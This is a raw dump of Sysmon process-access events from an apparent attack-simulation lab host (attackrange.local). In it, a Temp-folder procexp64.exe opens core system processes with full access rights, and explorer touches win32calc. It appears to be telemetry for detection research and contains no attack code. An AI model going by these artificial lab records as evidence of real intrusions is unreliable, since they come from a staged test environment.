15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.110{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.083{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.082{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.081{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.081{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.080{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.075{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.075{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.075{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.074{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.074{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.074{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.074{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.074{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 